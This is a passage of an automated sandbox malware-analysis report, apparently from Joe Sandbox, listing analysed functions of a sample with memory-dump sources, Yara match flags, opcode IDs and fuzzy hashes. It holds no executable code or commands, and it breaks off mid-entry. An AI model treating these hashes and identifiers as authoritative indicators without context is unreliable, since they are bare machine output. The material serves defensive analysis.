                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                        • Instruction ID: 5d8f504d13bff7d69cff02e5329df9d5bf5ec9e4080cbf34290a07c63c52dc3e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D127C61608BC28ED325CA3C8849756BFD16BA6224F1CC79DD0F94B3D3C27AD546C7A2
                                                                                                                                                                                                                                                                        Function 00420939 Relevance: .4, Instructions: 438COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                        • Instruction ID: 6af0af9fd07dbea0327a8a302486079f3e258e751aa577ffaaa1b30c4ee5c47c
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B129D61608BC28ED315CA3C8848756BFD16BA6228F1CC79DD0F94B3D3C27A9546C7A2
                                                                                                                                                                                                                                                                        Function 00415220 Relevance: .4, Instructions: 436COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                                                                                                                                                                                                                                        • Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A
                                                                                                                                                                                                                                                                        Function 00728055 Relevance: .4, Instructions: 415COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
                                                                                                                                                                                                                                                                        • Instruction ID: 91ae254e8732ebf627d16462272c58b8b347736b6966e9014697d632d79873f2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BB1647AA05760DBD3248B99D880ABFB7D2FB95300F1D993DC9C2A7251CB399C048797
                                                                                                                                                                                                                                                                        Function 00736937 Relevance: .4, Instructions: 412COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 91e403f7bf2fe428c8ff2ae1696841098b740060b83e87f0c1d5348c1599076f
                                                                                                                                                                                                                                                                        • Instruction ID: 23a67f9784c40b4fae1e0f2a92ee3ce02bb6a5ad8394e214f8bdb8e2c0ae01d9
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91e403f7bf2fe428c8ff2ae1696841098b740060b83e87f0c1d5348c1599076f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAB129B1704251ABFB18CE24C8556ABB7A2EF81304F19C53DE885CB382D73DED058761
                                                                                                                                                                                                                                                                        Function 004266D0 Relevance: .4, Instructions: 412COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                        • Opcode ID: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                                                                                                                                                                                                                                                        • Instruction ID: 0d04b2c2fa50837e9638c4fbed55210e4b06bf37a5b46dbaee5e4e245b9bea77
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91B15C717043614BEB18DF24E85266B77A2EB81304F5AC53EE8859B386D63CDC09C79A
                                                                                                                                                                                                                                                                        Function 0071EC77 Relevance: .4, Instructions: 411COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                                                                                                                                                                                                                                                        • Instruction ID: 7d2d6a85687870c0c9ca51156fc2f46ed212c0f6d0c543313ff0b17e2dae2fdb
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ECF1C2F0914B40BFC3A5CF3AC946797BEECEB0A260F14491EF5AEC2241D73565458BA2
                                                                                                                                                                                                                                                                        Function 0040EA10 Relevance: .4, Instructions: 411COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                                                                                                                                                                                                                                                        • Instruction ID: c845803a38f6c77acddbfa9eef1216980ece3764384c33bb2f9187d8778c445e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BF1C0F0904B40AFC3A5CF3AC942797BEECEB0A360F14491EF5AEC2241D73561458BA6
                                                                                                                                                                                                                                                                        Function 0072FEDC Relevance: .4, Instructions: 387COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                                                                                                                                                                                                                                                        • Instruction ID: e0078b9e96e2c1da739a03cdcf07114686bc40967900750d8dc01d1a5bf4b988
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE022761508BC18ED3268B3C8858A16BFD26B66224F0EC7DCD4E94F7E3C679D505C7A2
                                                                                                                                                                                                                                                                        Function 0041FC75 Relevance: .4, Instructions: 387COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                                                                                                                                                                                                                                                        • Instruction ID: 41c3e091da67547de47b3906f8a28cdcf4f9a35dde57214a1a091a27875e02c3
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0024861508BC18ED3268B3C8848A56BFD26BA6224F0DC79DD4E94F7E3C279D506C762
                                                                                                                                                                                                                                                                        Function 00426B95 Relevance: .4, Instructions: 356COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                                                                                                                                                                                                                                                        • Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9
                                                                                                                                                                                                                                                                        Function 0074F597 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 43a38f77119da688ac3ac81b48a3df6363d837cca15ab4ad9599a2e3d82993cc
                                                                                                                                                                                                                                                                        • Instruction ID: c076d9a4ee4bd5e7e08a38785b8082ad3dd9d45a3786a7c186c84ad49bf35078
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43a38f77119da688ac3ac81b48a3df6363d837cca15ab4ad9599a2e3d82993cc
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8B10736A183519BC724CF28C48056BB7E2FF99710F1A853CEA869B365E735AC41D781
                                                                                                                                                                                                                                                                        Function 0043F330 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                        • Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                                                                                                                                                                                                                                                        • Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785
                                                                                                                                                                                                                                                                        Function 0072E0E7 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 3c637dafc4c5c02bba21bf8384fb5f02d2acdfb7e2cfb5a4e70ebd11587584d3
                                                                                                                                                                                                                                                                        • Instruction ID: 7d52404cd5ed0818def8007ad454468f2dc10da8b6269fbf78b5191b8b1219fc
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c637dafc4c5c02bba21bf8384fb5f02d2acdfb7e2cfb5a4e70ebd11587584d3
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BB1C072908311EFD720AF24DC45B1ABBE2BF94350F144A2CF4D8972A1D77A9D25CB42
                                                                                                                                                                                                                                                                        Function 0041DE80 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
                                                                                                                                                                                                                                                                        • Instruction ID: 8a51dd8e2965cc9f0c4013a2f6a7698077ed2e8ce9dcff126952d1e9ceec8530
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFB15579904301AFDB108F25DC41B5ABBE2BFD8314F144A3EF898932A1D776DD668B06
                                                                                                                                                                                                                                                                        Function 007323F7 Relevance: .3, Instructions: 330COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: dd71efafbe3cc21deb18af7b1feb0adcacd6565e9113104d404282071b8f505b
                                                                                                                                                                                                                                                                        • Instruction ID: 3d68927155322c9fb77b85783295356b4f075228d206aee41bca5164af2677f0
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd71efafbe3cc21deb18af7b1feb0adcacd6565e9113104d404282071b8f505b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 259124B2A043119BE7249F24CC92B6BB3B5EFD1314F14482CE9869B382E779ED05C756
                                                                                                                                                                                                                                                                        Function 00422190 Relevance: .3, Instructions: 330COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                                                                                                                                                                                                        • Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A
                                                                                                                                                                                                                                                                        Function 00726F35 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: d66196a234f06480f41816911af9b4ea699047e9e12ae4b8e975acb0d7698cc7
                                                                                                                                                                                                                                                                        • Instruction ID: c9c48577c6a5ac8b4f0e8579aaa165d9faf68c4f9f768de92058a807ec063e88
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d66196a234f06480f41816911af9b4ea699047e9e12ae4b8e975acb0d7698cc7
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8A1F5729183228BC724CF24C9916ABB7F1FFD4750F1A8A2DD8C59B664E7389D41C781
                                                                                                                                                                                                                                                                        Function 0074F217 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 73df037b7ed471f27b11ebbe38ccb4fbfbef165bc0754b8ed2e20a33442e0b7b
                                                                                                                                                                                                                                                                        • Instruction ID: 508a6b3ef77f72f40b03bf8568c6893e650a3a08a9226c1bc078d339eb410ccd
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73df037b7ed471f27b11ebbe38ccb4fbfbef165bc0754b8ed2e20a33442e0b7b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17A1E1366042018BC718DF28C99092BB3E2FFD9710F2A857CE9869B355EB35EC11DB41
                                                                                                                                                                                                                                                                        Function 007164E7 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                        • Instruction ID: e8c9f4ebddd6112809fd69e01deab0a06f5a2ad4e98795230358669560bc0e5b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EDC14CB2A487418FC360CF68DC96BABB7F1BF85318F08492DD1D9C6242E778A155CB46
                                                                                                                                                                                                                                                                        Function 00406280 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                        • Instruction ID: afe5d4654f5e8657962bc42cc500043a3620e9a043509faccf93fb76782c58a6
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DBC15BB29087418FC360CF28DC96BABB7F1BF85318F09492DD1DAD6242E778A155CB46
                                                                                                                                                                                                                                                                        Function 0042830D Relevance: .3, Instructions: 301COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
